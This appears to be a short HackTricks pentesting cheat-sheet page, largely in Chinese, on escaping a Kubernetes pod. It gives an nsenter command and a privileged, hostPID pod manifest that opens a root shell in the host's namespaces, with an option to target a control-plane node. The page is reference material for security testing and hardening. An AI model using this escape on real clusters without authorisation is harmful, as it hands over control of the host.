Pod Escape Privileges

Support HackTricks

Privileged and hostPID

通过这些权限,您将访问主机进程有足够的权限进入主机进程的命名空间。 请注意,您可能不需要特权,而只需要一些能力和其他潜在的防御绕过(如 apparmor 和/或 seccomp)。

只需执行以下类似的操作即可让您逃离 pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

配置示例:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
支持 HackTricks

Last updated